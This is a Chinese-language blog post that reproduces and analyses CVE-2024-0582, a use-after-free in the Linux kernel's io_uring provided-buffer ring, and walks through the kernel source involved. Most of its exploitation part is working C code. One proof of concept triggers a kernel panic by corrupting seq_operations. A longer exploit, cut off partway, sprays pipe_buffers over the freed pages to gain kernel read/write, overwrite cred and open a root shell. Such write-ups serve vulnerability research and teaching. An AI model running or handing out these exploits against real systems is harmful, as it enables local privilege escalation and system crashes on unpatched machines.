【CVE.0x0C】CVE-2024-0582 漏洞复现及简要分析

本文最后更新于:2025年3月14日 上午

Pwn 完一结算 io_uring 得了 MVP!mmap 就是躺赢狗!

0x00. 一切开始之前

CVE-2024-0582 是一个发生在 Linux kernel 的 io_uring 这一高性能异步 IO API 中的漏洞:使用 IORING_REGISTER_PBUF_RING 注册的 ring buffer 在被 mmap() 映射到用户空间之后,仍然可以被注销并释放,而用户态的映射依旧有效,由此形成了内存在释放后仍可被使用的 UAF 漏洞,攻击者可以通过该漏洞攻击内核以完成本地提权;该漏洞的 CVSS 分数为 7.8 ,影响版本包括但不限于 6.4~6.6.5 ,本文我们选用 6.4 版本的内核源码进行分析

在开始之前,请先自行了解 IO_URING 相关的基础知识

等后面有更多时间了笔者再写几篇 io_uring 相关的博客,现在先🕊着:)

0x01. 漏洞分析

PBUF_RING Internal

众所周知 IO_URING 提供了下面三个新的系统调用:

  • io_uring_setup():创建 io_uring 上下文,主要是创建一个 SQ 队列与一个 CQ 队列,并指定 queue 的元素数量;该系统调用会返回一个文件描述符以供我们进行后续操作
  • io_uring_register():操作用于异步 I/O 的文件或用户缓冲区(files or user buffers),主要有注册(在内核中创建新的缓冲区)、更新(更新缓冲区内容)、注销(释放缓冲区)等操作,已经注册的缓冲区大小无法调整
  • io_uring_enter():提交新的 I/O 请求,可以选择是否等待 I/O 完成

对于 io_uring_register() ,其系统调用原型如下:

1
2
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)

在其核心逻辑的 __io_uring_register() 函数当中有一个大的 switch 来为不同的 opcode 调用不同的处理函数,我们主要关注于与 PBUF_RING 相关的部分

I. 注册:IORING_REGISTER_PBUF_RING

对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING 的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
/*
 * Handle IORING_REGISTER_PBUF_RING: register a provided-buffer ring for the
 * buffer group reg.bgid on @ctx.
 *
 * @ctx: io_uring context the ring is registered on.
 * @arg: user pointer to a struct io_uring_buf_reg describing the request.
 *
 * Returns 0 on success or a negative errno: -EFAULT if @arg cannot be copied
 * (or ring_addr is zero in the non-mmap case), -EINVAL for malformed
 * arguments, -EEXIST if the group already holds a mapped ring or classic
 * buffers, -ENOMEM if the list allocation fails, or whatever the pin/alloc
 * helper returns.
 */
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
/* free_bl stays NULL unless this call allocates a new list below */
struct io_buffer_list *bl, *free_bl = NULL;
int ret;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

/* reserved fields must be zero; IOU_PBUF_RING_MMAP is the only flag accepted */
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags & ~IOU_PBUF_RING_MMAP)
return -EINVAL;
if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
/* user-provided memory: an address is required and must be page aligned */
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
} else {
/* kernel-allocated memory: the caller must not pass an address */
if (reg.ring_addr)
return -EINVAL;
}

if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
return -EINVAL;

/* set up ctx->io_bl on first use for group ids below BGID_ARRAY */
if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
/* note: this inner 'ret' shadows the function-level 'ret' */
int ret = io_init_bl_list(ctx);
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->is_mapped || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
/* no list for this group yet: allocate one and remember it for the error path */
free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

/* back the ring either with pinned user pages or with kernel-allocated pages */
if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
ret = io_alloc_pbuf_ring(&reg, bl);

if (!ret) {
bl->nr_entries = reg.ring_entries;
/* ring_entries was checked to be a power of two, so entries - 1 is the index mask */
bl->mask = reg.ring_entries - 1;

io_buffer_add_list(ctx, bl, reg.bgid);
return 0;
}

/* failure: release only a list allocated by this call (free_bl is NULL otherwise) */
kfree(free_bl);
return ret;
}

略过各种参数检查等,我们主要关注其核心逻辑:

  • 首先调用 io_buffer_get_list() 获取已经存在的 io_buffer_list 结构体,如果不存在则分配
  • 如果请求中带有 IOU_PBUF_RING_MMAP 标志位,调用 io_alloc_pbuf_ring() 由内核分配连续页面,否则调用 io_pin_pbuf_ring() 将来自用户态的页面 pin 到 ring 上
  • 完成后将结果写入前面分配的 io_buffer_list 结构体中记录,并将该 io_buffer_list 放到当前的上下文中

这里的子标志位主要用来指示 ring buffer 的分配者,若设置了 IOU_PBUF_RING_MMAP 意味着由内核分配环形缓冲区的内存,之后用户态应用使用 mmap() 映射以访问:

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
* Flags for IORING_REGISTER_PBUF_RING.
*
* IOU_PBUF_RING_MMAP: If set, kernel will allocate the memory for the ring.
* The application must not set a ring_addr in struct
* io_uring_buf_reg, instead it must subsequently call
* mmap(2) with the offset set as:
* IORING_OFF_PBUF_RING | (bgid << IORING_OFF_PBUF_SHIFT)
* to get a virtual mapping for the ring.
*/
enum {
IOU_PBUF_RING_MMAP = 1,
};

若未设置该标志位,则意味着由用户态程序提供对应的页面,此时内核会调用 io_pin_pages() 并最终调用 pin_user_pages() 完成这一操作

因为我们的漏洞出现在和 mmap() 相关的路径上,因此我们主要关注调用 io_alloc_pbuf_ring() 这一路径,该函数最终会调用 __get_free_pages() 分配空闲页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * Allocate kernel pages to back a provided-buffer ring and attach them to @bl.
 *
 * @reg: registration request; only ring_entries is read here.
 * @bl:  buffer list that receives the allocation.
 *
 * Returns 0 on success, -ENOMEM if the page allocation fails.
 */
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;

/* size in bytes, turned into a page allocation order by get_order() below */
ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;

bl->buf_ring = ptr;
/*
 * Both flags are set on this path: is_mapped is what the register and
 * unregister paths test, is_mmap is what __io_remove_buffers() and
 * io_pbuf_get_address() test.
 */
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}

分配的结构大概长这个样子:

II. 注销:IORING_UNREGISTER_PBUF_RING

有注册就有注销,有内存分配就有内存释放,注销 PBUF_RING 对应的 opcode 为 IORING_UNREGISTER_PBUF_RING ,内核会调用到 io_unregister_pbuf_ring() 进行处理:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/*
 * Handle IORING_UNREGISTER_PBUF_RING: tear down the buffer ring registered
 * for the group reg.bgid.
 *
 * @ctx: io_uring context that owns the buffer group.
 * @arg: user pointer to a struct io_uring_buf_reg; bgid selects the group,
 *       resv[] and flags must be zero.
 *
 * Returns 0 on success, -EFAULT if @arg cannot be copied, -EINVAL for
 * non-zero reserved fields/flags or a list that is not a mapped ring, and
 * -ENOENT if no list exists for the group.
 */
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags)
return -EINVAL;

bl = io_buffer_get_list(ctx, reg.bgid);
if (!bl)
return -ENOENT;
if (!bl->is_mapped)
return -EINVAL;

/*
 * Release the ring's backing memory. Nothing in this function checks
 * whether user space still has the ring mmap()ed.
 */
__io_remove_buffers(ctx, bl, -1U);
/* only lists with bgid >= BGID_ARRAY are erased from io_bl_xa and freed here */
if (bl->bgid >= BGID_ARRAY) {
xa_erase(&ctx->io_bl_xa, bl->bgid);
kfree(bl);
}
return 0;
}

不难看出其核心逻辑为:

  • 首先调用 io_buffer_get_list() 获取已经存在的 io_buffer_list 结构体,如果不存在则返回
  • 接下来调用 __io_remove_buffers() 释放 io_buffer_list 当中的页面
  • 最后调用 xa_erase() 从上下文中移除该 io_buffer_list 并释放

在看 __io_remove_buffers() 之前,我们首先回去看 io_alloc_pbuf_ring() ,注意到 io_buffer_list 这些成员的赋值:

1
2
3
4
5
6
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
/* ... */
bl->is_mapped = 1;
bl->is_mmap = 1;

因此在 __io_remove_buffers() 当中,我们会进入下面的路径将前面分配的页面释放掉:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;

/* shouldn't happen */
if (!nbufs)
return 0;

if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
struct page *page;

page = virt_to_head_page(bl->buf_ring);
if (put_page_testzero(page))
free_compound_page(page);
bl->buf_ring = NULL;
bl->is_mmap = 0;
} /* ... */
}

在后面的版本中释放页面的逻辑会从使用 put_page_testzero() 换成 folio_put(virt_to_folio(bl->buf_ring)); ,因此在修复该漏洞的 commit 当中你看到的是去除掉了 folio_put() 函数,但本质上的逻辑是一样的

III. 使用:io_uring_mmap

我们如何从用户空间访问 io_alloc_pbuf_ring() 分配的内存?内核通过 mmap() 为我们提供了一个方便快捷的途径,当我们对一个 io_uring 的 fd 使用 mmap() 进行映射时,内核最终会调用到 io_uring_mmap() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * mmap() handler for an io_uring file (installed as .mmap in io_uring_fops).
 *
 * @file: the io_uring file being mapped.
 * @vma:  the VMA describing the requested mapping; vm_pgoff encodes which
 *        region is requested.
 *
 * Returns the result of remap_pfn_range(), or the negative errno carried by
 * the pointer from io_uring_validate_mmap_request() when validation fails.
 */
static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;

/* resolve the offset to the kernel address of the region and check the size */
ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);

/*
 * Map the region into the caller's address space by page frame number.
 * This function itself takes no reference on the underlying pages.
 */
pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

//...

static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,

io_uring_validate_mmap_request() 函数中首先会根据 mmap() 的 offset 参数判断具体操作,这里我们也可以看出对于 io_uring 而言 mmap() 的最后一个参数并非传统意义上用来表示偏移值,而是使用高位数据作为 mask 表示不同类型,低位存储具体数据,这里我们主要关注和 PBUF_RING 相关的分支:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
 * Translate an mmap() request on an io_uring file into the kernel address of
 * the region to map.
 *
 * @file:  the io_uring file; its private_data is the io_ring_ctx.
 * @pgoff: page offset from the VMA, shifted back into a byte offset here.
 * @sz:    length of the requested mapping in bytes.
 *
 * Returns the kernel virtual address of the selected region, or
 * ERR_PTR(-EINVAL) if mmap is disabled for this ring, the offset selects no
 * known region, no mmap-able buffer ring exists for the requested group, or
 * @sz exceeds the size of the backing page.
 */
static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

/* Don't allow mmap if the ring was setup without it */
if (ctx->flags & IORING_SETUP_NO_MMAP)
return ERR_PTR(-EINVAL);

/* the bits under IORING_OFF_MMAP_MASK select which region is being mapped */
switch (offset & IORING_OFF_MMAP_MASK) {
case IORING_OFF_SQ_RING:
case IORING_OFF_CQ_RING:
/* both offsets resolve to the same ctx->rings region */
ptr = ctx->rings;
break;
case IORING_OFF_SQES:
ptr = ctx->sq_sqes;
break;
case IORING_OFF_PBUF_RING: {
unsigned int bgid;

/* the remaining offset bits carry the buffer group id */
bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
/* uring_lock covers only the lookup; ptr is used after it is dropped */
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}

/* refuse mappings longer than the page that backs the region */
page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);

return ptr;
}

io_pbuf_get_address 的逻辑就简单很多,主要就是取出我们前面分配的 buf_ring

1
2
3
4
5
6
7
8
9
10
/*
 * Look up the kernel address of the mmap-able buffer ring of a buffer group.
 *
 * @ctx:  io_uring context to search.
 * @bgid: buffer group id.
 *
 * Returns bl->buf_ring for the group, or NULL if the group has no buffer
 * list or its list does not have is_mmap set.
 */
void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
struct io_buffer_list *bl;

bl = io_buffer_get_list(ctx, bgid);
if (!bl || !bl->is_mmap)
return NULL;

return bl->buf_ring;
}

Root Cause

我们其实不难看出漏洞出现在缺乏对内存所有权的严格管控:当我们将 bl->buf_ring 的内存通过 mmap() 映射出去之后, 居然仍旧能够直接通过 io_unregister_pbuf_ring 函数将这块内存给释放掉 ,由此我们先进行内存分配、再进行 mmap() 、最后再释放这块内存就直接有一个 UAF 了: 我们可以通过 mmap() 的内存区域直接读写释放掉的内存页

Proof-Of-Concept

这里笔者给出自己写的 POC,主要就是利用 UAF 漏洞在 seq_file::seq_operations 里瞎写一通造成 kernel panic:

为什么用 liburing 而不是自己手搓 raw syscall?因为👴还没那么闲得慌

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

/*
 * Pin the calling process to a single CPU.
 *
 * @core: index of the CPU to run on.
 *
 * sched_setaffinity() can fail (for example when @core is not available to
 * this process), so its result is checked and the failure is reported via
 * perror() instead of unconditionally printing the success message.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror(ERR_MSG("[x] Unable to bind process to core"));
        return;
    }

    printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;

memset(&buf_reg, 0, sizeof(buf_reg));

/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;

ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}

/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);

if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}

*retp = 0;
return buf_ring;
}

#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200

void proof_of_concept(void)
{
struct io_uring ring;
void **buffers;
int seq_fd[SEQ_FILE_NR], found = 0;
int ret;

puts(SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESSS_MSG("-----------------------------------------------\n"));

puts("[*] Preparing...");

bind_core(0);

if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}

puts("[*] Allocating pbuf ring and doing mmap()...");

buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}

io_uring_buf_ring_init(buffers[i]);
}

puts("[*] Triggering page-level UAF vulnerabilities...");

for (int i = 0; i < NR_BUFFERS; i++) {
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Reallocating page into seq_file::seq_operations...");

for (int i = 0; i < SEQ_FILE_NR; i++) {
if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
printf(
ERR_MSG("[x] Unable to open") " No.%d "
ERR_MSG("seq file, error code: ") "%d\n",
i,
seq_fd[i]
);
exit(EXIT_FAILURE);
}
}

puts("[*] Checking data leak and overwriting...");

for (int i = 0; i < NR_BUFFERS; i++) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000) {
printf(
SUCCESSS_MSG("[+] Got kernel data leak:") " %lx "
SUCCESSS_MSG("at location ") "%d-%d\n",
buffer[j],
i,
j
);
buffer[j] = *(uint64_t*) "arttnba3";
found = 1;
goto out;
}
}
}

if (!found) {
puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
exit(EXIT_FAILURE);
}

out:
puts("[*] Triggering kernel panic...");

sleep(1);

for (int i = 0; i < SEQ_FILE_NR; i++) {
char buf[0x1000];
read(seq_fd[i], buf, 1);
}

puts("[?] So you're still alive here!?");
system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
proof_of_concept();
return 0;
}

运行,成功造成 kernel panic:

0x02. 漏洞利用

这个 UAF 可谓是相当的白给,其来自于非常常见的分配 page 的 API,并且可以在用户空间直接读写 UAF page,所以利用方式基本上可以说是多种多样的, 可谓是想怎么利用就怎么利用,而且还特别稳定

这里笔者直接用 page-level UAF 通过改写 pipe_buffer::page 的方式获取内核空间任意读写的权能,之后直接改写当前进程的 cred 结构体完成提权:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/prctl.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
uint64_t kernel_base, vmemmap_base, page_offset_base;

/*
 * Pin the calling process to a single CPU.
 *
 * @core: index of the CPU to run on.
 *
 * sched_setaffinity() can fail (for example when @core is not available to
 * this process), so its result is checked and the failure is reported via
 * perror() instead of unconditionally printing the success message.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror(ERR_MSG("[x] Unable to bind process to core"));
        return;
    }

    printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

/*
 * Print a printf-style message to stdout, then terminate with EXIT_FAILURE.
 *
 * @fmt: printf-style format string.
 * @...: arguments consumed by @fmt.
 *
 * The variadic arguments are forwarded with vprintf(): handing a va_list to
 * printf() is undefined behaviour and prints garbage. Both standard streams
 * are flushed, and the process sleeps for five seconds before exiting.
 * This function does not return.
 */
void err_exit(const char *fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    vprintf(fmt, args);
    va_end(args);

    fflush(stdout);
    fflush(stderr);

    sleep(5);

    exit(EXIT_FAILURE);
}

void get_root_shell(void)
{
if(getuid()) {
puts(ERR_MSG("[x] Failed to get the root!"));
sleep(5);
exit(EXIT_FAILURE);
}

puts(SUCCESS_MSG("[+] Successful to get the root."));
puts(INFO_MSG("[*] Execve root shell now..."));

system("/bin/sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;

memset(&buf_reg, 0, sizeof(buf_reg));

/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;

ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}

/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);

if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}

*retp = 0;
return buf_ring;
}

/**
* In my test environment, kmalloc-1k allocates from 4-page slub, so I chose 4.
* However, it might not be the same in your environment, e.g., it's 8 on my PC.
* Check your /proc/slabinfo before doing the exploitation.
*/
#define NR_PAGES 4
#define NR_BUFFERS 0x200
#define SEQ_FILE_NR 0x200
#define PIPE_SPRAY_NR 0x1F0

struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct cred {
long usage;
uint32_t uid;
uint32_t gid;
uint32_t suid;
uint32_t sgid;
uint32_t euid;
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};

void read_kernel_page_by_pipe(struct page*page,struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0xffe;

if (read(pipe_fd[0], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do reading on pipe"));
exit(EXIT_FAILURE);
}
}

void write_kernel_page_by_pipe(struct page *page,
struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0;

if (write(pipe_fd[1], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do writing on pipe"));
exit(EXIT_FAILURE);
}
}

void exploit(void)
{
struct io_uring ring;
void **buffers;
struct pipe_buffer *kern_pipe_buffer = NULL;
uint64_t kernel_leak;
int pipe_fd[PIPE_SPRAY_NR][2], victim_idx = -1;
uint32_t uid, gid;
uint64_t cred_kaddr, cred_kpage_addr;
struct cred *cred_data;
char buf[0x1000];
int ret;

puts(SUCCESS_MSG("-------- CVE-2024-0582 Exploitation --------") "\n"
INFO_MSG("-------- Author: ")"arttnba3"INFO_MSG(" --------") "\n"
SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));

bind_core(0);

puts("[*] Initializing io_uring ...");

if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}

puts("[*] Allocating pbuf ring and doing mmap() ...");

buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}

io_uring_buf_ring_init(buffers[i]);
}

puts("[*] Triggering page-level UAF vulnerabilities ...");

for (int i = 0; i < NR_BUFFERS; i += 2) { /* we neeed "holes" */
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Reallocating pages as pipe_buffers ...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if ((ret = pipe(pipe_fd[i])) < 0) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pipe, error code: ") "%d\n",
i,
ret
);
